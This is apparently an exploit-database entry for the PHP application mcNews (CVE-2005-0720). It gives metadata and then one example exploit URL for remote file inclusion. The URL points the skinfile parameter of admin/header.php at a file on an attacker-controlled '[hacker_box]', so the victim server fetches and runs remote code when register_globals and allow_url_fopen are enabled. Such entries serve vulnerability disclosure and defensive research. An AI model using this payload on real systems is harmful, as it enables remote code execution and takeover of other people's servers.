Author: Filip Groszynski type: webapps platform: php port: date_added: 2005-03-06 date_updated: verified: 1 codes: OSVDB-14601;CVE-2005-0720 tags: aliases: screenshot_url: application_url:
Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/ # milw0rm.com [2005-03-07]